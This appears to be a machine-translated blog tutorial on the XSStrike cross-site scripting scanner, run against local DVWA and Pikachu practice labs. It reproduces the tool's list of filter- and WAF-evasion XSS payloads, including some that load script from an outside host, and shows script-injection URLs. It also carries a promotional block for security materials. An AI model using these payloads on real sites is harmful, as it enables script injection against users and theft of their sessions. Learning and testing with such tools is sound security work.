Install
clone
git clone https://github.com/s0md3v/XSStrike.gitinstall module
pip3 install -r requirements.txtEnvironmental requirements
python version
>=3.4
operating system
Linux (Arch, Debian, Ubnutu), Termux, Windows (7 & 10), Mac
options
help
python xsstrike.py -h
add target url
single
GET method
Options: -u or --url
python xsstrike.py -u "http://example.com/search.php?q=query"python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<script>alert('xss')</script>"
POST method
option: --data
python xsstrike.py -u "http://example.com/search.php" --data "q=query"python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_s/" --data "txtName=test&mtxMessage=This+is+a+test+comment.&btnSign=Sign+Guestbook"
[1> To obtain all resources, click here <1]
1. Many out-of-print e-books that are no longer available
2. Internal training materials of major security companies
3. A full set of toolkits
4. 100 copies of src source code technical documents
5. Basics of network security Getting started, Linux, web security, offensive and defensive videos
6, emergency response notes 7, network security learning route
8, ctf capture the flag analysis
9, WEB security entry notes
from file
Option: --seeds do not use the -u option
python xsstrike.py --seeds urls.txtdocument content:
Test url path components
options: --path
Want to inject payload like this in URL path http://example.com/search/<payload>
python xsstrike.py -u "http://example.com/search/form/query" --path
POST data is in json format
options: --json
python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"}' --json
Crawling
Start scouting and testing from your landing page.
default
options: --crawl
python xsstrike.py -u "http://example.com/page.php" --crawl
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/" --crawl
1/1 is what it found, and it doesn't even add a space, which is not very mature.
crawl depth
Option -l or --level defaults to 2
python xsstrike.py -u "http://example.com/page.php" --crawl -l 3
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/" --crawl -l 3
Read payloads from file
Options: -f or --file
python3 xsstrike.py -u "http://example.com/page.php?q=query" -f /path/to/file.txt
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=''" -f payloads.txt
After the test is completed, the result is not given? ? ?
Find hidden parameters
options: --params
python xsstrike.py -u "http://example.com/page.php" --params
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/" --params
This little thing is a needle or not :), I can’t even write the article, it’s far from sqlmap! ! !
time problem
Threads
options: -tor --threads, default: 2
python xsstrike.py -u "http://example.com" -t 10 --crawl -l 3
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/" -t 3 --crawl -l 3
time out
Options: --timeout, Default: 7
python xsstrike.py -u "http://example.com/page.php?q=query" --timeout=4
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --timeout=3
Delay
delay between two requests
options: -dor --delay, default: 0
python xsstrike.py -u "http://example.com/page.php?q=query" -d 2
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" -d 2
headers
options: --headers 使用\n分隔
python xsstrike.py -u http://example.com/page.php?q=query --headers "Accept-Language: en-US\nCookie: null"
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --headers "Cookie:security=low; csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=h9u1rmfie6ck34qsa2890777o1"
It's so good, I can't help but grab the bag! ! !
big brother? ? ? What about cookies? ? ? WTF
Forget about the previous one, it should be a cookie problem, and my mentality exploded when I did this. Is this GitHub's first XSS injection artifact? ? ?
blind note
options: --blind
When crawling with this option, XSStrike injects core/config.py中的盲注payloads到every parameter defined in every HTML form.
core/config.py中的payloads
python xsstrike.py -u "http://example.com/page.php?q=query" --crawl --blind
payloads = ( # Payloads for filter & WAF evasion
'\'"</Script><Html Onmouseover=(confirm)()//'
'<imG/sRc=l oNerrOr=(prompt)() x>',
'<!--<iMg sRc=--><img src=x oNERror=(prompt)`` x>',
'<deTails open oNToggle=confi\u0072m()>',
'<img sRc=l oNerrOr=(confirm)() x>',
'<svg/x=">"/οnlοad=confirm()//',
'<svg%0Aοnlοad=%09((pro\u006dpt))()//',
'<iMg sRc=x:confirm`` oNlOad=e\u0076al(src)>',
'<sCript x>confirm``</scRipt x>',
'<Script x>prompt()</scRiPt x>',
'<sCriPt sRc=//14.rs>',
'<embed//sRc=//14.rs>',
'<base href=//14.rs/><script src=/>',
'<object//data=//14.rs>',
'<s=" οnclick=confirm``>clickme',
'<svG oNLoad=co\u006efirm(1)>',
'\'"><y///oNMousEDown=((confirm))()>Click',
'<a/href=javascript:co\u006efirm("1")>clickme</a>',
'<img src=x οnerrοr=confir\u006d`1`>',
'<svg/οnlοad=co\u006efir\u006d`1`>')
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --crawl --blind
payload encoding
Options: -eor --encode
XSStrike can encode payloads on demand. Currently only base64 is supported.
python xsstrike.py -u "http://example.com/page.php?q=query" -e base64
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" -e base64
fuzz testing
options: --fuzzer
This fuzzer is designed to test filters and web application firewalls.
python xsstrike.py -u "http://example.com/search.php?q=query" --fuzzer
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --fuzzerThe log shows the lowest level
Options (console): --console-log-level,默认:INFO
python xsstrike.py -u "http://example.com/search.php?q=query" --console-log-level WARNING
options( 文件):--file-log-level,默认:None
python xsstrike.py -u "http://example.com/search.php?q=query" --console-log-level DEBUG
Options (fits --file-log-level): --log-file,默认: xsstrike.log
python xsstrike.py -u "http://example.com/search.php?q=query" --file-log-level INFO --log-file output.log
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --crawl --blind --headers "Cookie:security=low; csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=h9u1rmfie6ck34qsa2890777o1" --file-log-level INFO
I can discover this myself. . . Wasted time, went to sleep. . .
keep doing it. . . Maybe someday it will be okay
skip confirmation prompt
Option: --skip
Use this option if you want XSStrike to continue scanning after finding a working payload without asking. It will also skip the generation of the POC.
python xsstrike.py -u "http://example.com/search.php?q=query" --skip
python xsstrike.py -u "127.0.0.1/dvwa/vulnerabilities/xss_r/?name=s" --skip
Skip Dom scanning
Option: --skip-dom
If it is determined that it is not a dom type, in order to save time, you can skip the dom scan.
python xsstrike.py -u "http://example.com/search.php?q=query" --skip-dom
python xsstrike.py -u "127.0.0.1/dvwa/vulnerabilities/xss_r/?name=s" --skip-domindeed no check dom
renew
options: --update
python xsstrike.py --update 
Analysis (DVWA not available)
Through the above, you have also seen a lot of my complaints. It seems that it should be the cookie problem of dvwa. This software seems to be doing a bad job in the aspect of cookies.
I tried the drone pikachu again, it works.
python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=q&submit=submit" --skip-dom
Have time to use XSStrike to write pikachu's xss injection
There are also many similar notes and tutorial materials, etc., and those who need them can get them by themselves
